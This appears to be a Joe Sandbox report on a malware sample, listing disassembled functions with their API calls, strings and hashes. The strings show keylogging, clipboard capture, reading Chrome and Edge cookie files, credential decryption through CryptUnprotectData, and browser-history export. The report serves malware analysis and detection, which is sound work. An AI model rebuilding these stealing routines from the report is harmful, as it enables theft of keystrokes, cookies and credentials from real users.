                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                • String ID: `#D$`#D
                                • API String ID: 885266447-2450397995
                                • Opcode ID: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                                • Instruction ID: d0478598ef992627c852fcfbe86add3ca1c9fa58067414995f231753f3186543
                                • Opcode Fuzzy Hash: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                                • Instruction Fuzzy Hash: 78519071A00208AFDF18DF59C980AAEBBB2FB94314F59C19AF81897361D7B9DD41CB44
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0044B81F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101fileCOMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,FF8BC35D,00000000,?,PkGNG,0044BB7E,?,00000000,FF8BC35D), ref: 0044B8D2
                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0044B900
                                • GetLastError.KERNEL32 ref: 0044B931
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharErrorFileLastMultiWideWrite
                                • String ID: PkGNG
                                • API String ID: 2456169464-263838557
                                • Opcode ID: f29f19b57bd44476b84c2158df793cbd226619e25f42890a5cb9caccfef44ccc
                                • Instruction ID: a4f89274a665815b2d7bd0a52cbb4c71b9b2878c435ac706d73e761117ab6cd9
                                • Opcode Fuzzy Hash: f29f19b57bd44476b84c2158df793cbd226619e25f42890a5cb9caccfef44ccc
                                • Instruction Fuzzy Hash: 18317271A002199FDB14DF59DC809EAB7B8EB48305F0444BEE90AD7260DB34ED80CBA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040404C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93sleepCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                  • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041B99F
                                  • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
                                  • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587
                                  • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                                • Sleep.KERNEL32(000000FA,00465E74), ref: 00404138
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                • String ID: /sort "Visit Time" /stext "$0NG
                                • API String ID: 368326130-3219657780
                                • Opcode ID: 5844705bffbe932e08c9a339546c7ba6e86f4bc1b82537618e6767435229dddb
                                • Instruction ID: 62b88373b0174ac8ae4090b78ebfd0a8fca35ca34796720d8357018cc2c92f87
                                • Opcode Fuzzy Hash: 5844705bffbe932e08c9a339546c7ba6e86f4bc1b82537618e6767435229dddb
                                • Instruction Fuzzy Hash: E9316271A0011956CB15FBA6D8969EE7375AB90308F40007FF206B71E2EF385D89CA99
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040B748 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 88COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                • __Init_thread_footer.LIBCMT ref: 0040B797
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Init_thread_footer__onexit
                                • String ID: [End of clipboard]$[Text copied to clipboard]$hdF
                                • API String ID: 1881088180-1379921833
                                • Opcode ID: 324d16734c00dd0800ed2bf7710d2d62d1c0e2a3751a5b5203366b445deaa986
                                • Instruction ID: c7bebb0a0a15900a9cc4ffb6e17528162536323bfdf0e6139bd55c50ddf57f74
                                • Opcode Fuzzy Hash: 324d16734c00dd0800ed2bf7710d2d62d1c0e2a3751a5b5203366b445deaa986
                                • Instruction Fuzzy Hash: C0219F32A101054ACB14FB66D8829EDB379AF90318F10453FE505731E2EF386D4A8A9C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004162E4 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 79COMMON
                                Download Yara Rule
                                APIs
                                • _wcslen.LIBCMT ref: 004162F5
                                  • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                  • Part of subcall function 00413877: RegSetValueExA.ADVAPI32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                                  • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                                  • Part of subcall function 00409DE4: _wcslen.LIBCMT ref: 00409DFD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: _wcslen$CloseCreateValue
                                • String ID: !D@$(x$okmode
                                • API String ID: 3411444782-2931462370
                                • Opcode ID: f3a158218bdd67d4c4b1fae7efd00a7e5adabf20f91f0610842615a967fde749
                                • Instruction ID: dff749dc984b923ba5de2327a6f3f9cc2e67bcaf748228c26ce3aec7d70e92d7
                                • Opcode Fuzzy Hash: f3a158218bdd67d4c4b1fae7efd00a7e5adabf20f91f0610842615a967fde749
                                • Instruction Fuzzy Hash: 10119371B442011ADB187B72D832ABD22969F94358F80443FF54AAF2E2DEBD4C51525D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040C5EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0040C4C3: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6
                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C61D
                                • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C688
                                Strings
                                • User Data\Profile ?\Network\Cookies, xrefs: 0040C635
                                • User Data\Default\Network\Cookies, xrefs: 0040C603
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExistsFilePath
                                • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                • API String ID: 1174141254-1980882731
                                • Opcode ID: 3f8b8350712af9d240db3e3edefbc0b5893a2e7bcab5cac2a7822d9b4b4e7b0e
                                • Instruction ID: e6b9b9a8142aca5ff9e4641a3ff80a721fb4b0471daa7637ae592fad8ebd6223
                                • Opcode Fuzzy Hash: 3f8b8350712af9d240db3e3edefbc0b5893a2e7bcab5cac2a7822d9b4b4e7b0e
                                • Instruction Fuzzy Hash: B421037190011996CB14F7A2DC96CEEB738EE50319F40053FB502B31D2EF789A46C698
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040C6BB Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0040C526: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559
                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6EC
                                • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C757
                                Strings
                                • User Data\Profile ?\Network\Cookies, xrefs: 0040C704
                                • User Data\Default\Network\Cookies, xrefs: 0040C6D2
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExistsFilePath
                                • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                • API String ID: 1174141254-1980882731
                                • Opcode ID: 8e96e49e63ca3bf0ac1f2790d6dd37b6dab53323dba9b7dc4ed1c0216d558f84
                                • Instruction ID: 83f6a23093d6b0727a30a1d550f3d6f5bdb2bb72864fa742cd8a9fd6423befd9
                                • Opcode Fuzzy Hash: 8e96e49e63ca3bf0ac1f2790d6dd37b6dab53323dba9b7dc4ed1c0216d558f84
                                • Instruction Fuzzy Hash: AE21D37190011AD6CB05F7A2DC96CEEB778EE50719B50013FF502B31D2EF789A46C698
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040A179 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                                Download Yara Rule
                                APIs
                                • CreateThread.KERNEL32(00000000,00000000,0040A27D,004750F0,00000000,00000000), ref: 0040A1FE
                                • CreateThread.KERNEL32(00000000,00000000,0040A267,004750F0,00000000,00000000), ref: 0040A20E
                                • CreateThread.KERNEL32(00000000,00000000,0040A289,004750F0,00000000,00000000), ref: 0040A21A
                                  • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
                                  • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateThread$LocalTimewsprintf
                                • String ID: Offline Keylogger Started
                                • API String ID: 465354869-4114347211
                                • Opcode ID: 3bd749956e3e9a916655ad8ba54339a6dfc039012b8b1fa6949936b121210f93
                                • Instruction ID: bcf1cfbdc14a627f6781ea3a40f7cea6448602225ce5b2be95dc640702f6c2bd
                                • Opcode Fuzzy Hash: 3bd749956e3e9a916655ad8ba54339a6dfc039012b8b1fa6949936b121210f93
                                • Instruction Fuzzy Hash: DE1194B12003187AD220B7369C86CBB765DDA8139CB00057FF946222D2EA795D54CAFB
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040AEEE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
                                  • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                • CreateThread.KERNEL32(00000000,00000000,0040A267,?,00000000,00000000), ref: 0040AF6E
                                • CreateThread.KERNEL32(00000000,00000000,0040A289,?,00000000,00000000), ref: 0040AF7A
                                • CreateThread.KERNEL32(00000000,00000000,0040A295,?,00000000,00000000), ref: 0040AF86
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateThread$LocalTime$wsprintf
                                • String ID: Online Keylogger Started
                                • API String ID: 112202259-1258561607
                                • Opcode ID: 5352f84320cf4356fc5397d5242ef4f16cbe8c43bf069df42c05d2cedde61efe
                                • Instruction ID: a86b307176fed80e65d2d8085b20e14cf0e56bf63d45b36b749a5edd9f3e52e0
                                • Opcode Fuzzy Hash: 5352f84320cf4356fc5397d5242ef4f16cbe8c43bf069df42c05d2cedde61efe
                                • Instruction Fuzzy Hash: 1401C8A070031939E62076365C87D7F7A5DCA81398F40057FF645362C6D97D1C5586FB
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0044BD6C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • CloseHandle.KERNEL32(00000000,00000000,0040F3BB,?,0044BC8A,0040F3BB,0046EBB0,0000000C), ref: 0044BDC2
                                • GetLastError.KERNEL32(?,0044BC8A,0040F3BB,0046EBB0,0000000C), ref: 0044BDCC
                                • __dosmaperr.LIBCMT ref: 0044BDF7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseErrorHandleLast__dosmaperr
                                • String ID: pmx
                                • API String ID: 2583163307-624778662
                                • Opcode ID: c386fb262ac1df75f9233a8cbac1a47ba8a32ae4ab5a4414f4170ecae5b11561
                                • Instruction ID: 6d8ae8a68538518658f59cc4ec35c635b4eb055c917d93d15d596e37dde74a72
                                • Opcode Fuzzy Hash: c386fb262ac1df75f9233a8cbac1a47ba8a32ae4ab5a4414f4170ecae5b11561
                                • Instruction Fuzzy Hash: 59010832A0426066E62462399C4577F6749CB92739F2546AFFD14872D3DB6CCC8182D9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041B4EF Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 59timeCOMMON
                                Download Yara Rule
                                APIs
                                • GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: LocalTime
                                • String ID: | $%02i:%02i:%02i:%03i $PkGNG
                                • API String ID: 481472006-3277280411
                                • Opcode ID: 978051ae2d71d51f6a46a557316c11cd91a1cbdf249e5825d4a92e87c892c4af
                                • Instruction ID: b0c371a91d376d28eb23a1cf2c2b6b2589463c7c7bf84255da33bc44f247512a
                                • Opcode Fuzzy Hash: 978051ae2d71d51f6a46a557316c11cd91a1cbdf249e5825d4a92e87c892c4af
                                • Instruction Fuzzy Hash: 361181714082055AC304EB62D8419BFB3E9AB44348F50093FF895A21E1EF3CDA49C65A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00404F51 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58timethreadCOMMON
                                Download Yara Rule
                                APIs
                                • GetLocalTime.KERNEL32(?), ref: 00404F81
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404FCD
                                • CreateThread.KERNEL32(00000000,00000000,00405150,?,00000000,00000000), ref: 00404FE0
                                Strings
                                • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Create$EventLocalThreadTime
                                • String ID: KeepAlive | Enabled | Timeout:
                                • API String ID: 2532271599-1507639952
                                • Opcode ID: accc46308d134a6526fb08aee99d3eab32d11686313fa6232e89ca864bb3edf7
                                • Instruction ID: 982fc92e7e47f2769c776e0d9ab1702947c5453eb715a4cfed9cf45540ca89dc
                                • Opcode Fuzzy Hash: accc46308d134a6526fb08aee99d3eab32d11686313fa6232e89ca864bb3edf7
                                • Instruction Fuzzy Hash: A8110671904385AAC720A7778C0DEAB7FA8DBD2710F04046FF54163291DAB89445CBBA
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00406A63 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406A82
                                • GetProcAddress.KERNEL32(00000000), ref: 00406A89
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressLibraryLoadProc
                                • String ID: CryptUnprotectData$crypt32
                                • API String ID: 2574300362-2380590389
                                • Opcode ID: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                                • Instruction ID: d796ed41fc96dc9ef8d801536240fab0e9422483ab40f89d2a564a4d0f07de08
                                • Opcode Fuzzy Hash: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                                • Instruction Fuzzy Hash: 6201B535B00216ABCB18DFAD9D449ABBBB8EB49300F14817EE95AE3341D674D9008BA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0044C253 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,10558B1C,10558B1C,PkGNG,0044C302,FF8BC369,00000000,00000002,00000000,PkGNG), ref: 0044C28C
                                • GetLastError.KERNEL32 ref: 0044C296
                                • __dosmaperr.LIBCMT ref: 0044C29D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorFileLastPointer__dosmaperr
                                • String ID: PkGNG
                                • API String ID: 2336955059-263838557
                                • Opcode ID: 60eaf30ffa5a6b77e16cdf42a69bcf8f7fa5cf007f91ab5b57ca5c6e56bd7837
                                • Instruction ID: 03228b3a5a263cac3d3762c0c6cb9bea0ee6cefe7ee70a3785aa569069518732
                                • Opcode Fuzzy Hash: 60eaf30ffa5a6b77e16cdf42a69bcf8f7fa5cf007f91ab5b57ca5c6e56bd7837
                                • Instruction Fuzzy Hash: 9E016D32A11104BBDF008FE9CC4089E3719FB86320B28039AF810A7290EAB5DC118B64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040515C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON
                                Download Yara Rule
                                APIs
                                • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                • CloseHandle.KERNEL32(?), ref: 004051CA
                                • SetEvent.KERNEL32(?), ref: 004051D9
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseEventHandleObjectSingleWait
                                • String ID: Connection Timeout
                                • API String ID: 2055531096-499159329
                                • Opcode ID: 6ba0741fc7cdd8782e8632b0dc009c189a51354901c2dba2396252722e458400
                                • Instruction ID: e4880b57ed2806ada623013920947221b56867654f576af2420d72dde76e11cf
                                • Opcode Fuzzy Hash: 6ba0741fc7cdd8782e8632b0dc009c189a51354901c2dba2396252722e458400
                                • Instruction Fuzzy Hash: 1201D831A40F40AFE7257B368D9552BBBE0FF01302704097FE68396AE2D6789800CF59
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040E7C5 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                Download Yara Rule
                                APIs
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E833
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Exception@8Throw
                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                • API String ID: 2005118841-1866435925
                                • Opcode ID: 8dcc56bc0b3abd67e197b42ddab56c72444c781ea05e0f6efff8352e2a22a648
                                • Instruction ID: aca7d9cae529c24a85643cb8f0975e7fdd15ab88b82278639a3f13e82648cb6f
                                • Opcode Fuzzy Hash: 8dcc56bc0b3abd67e197b42ddab56c72444c781ea05e0f6efff8352e2a22a648
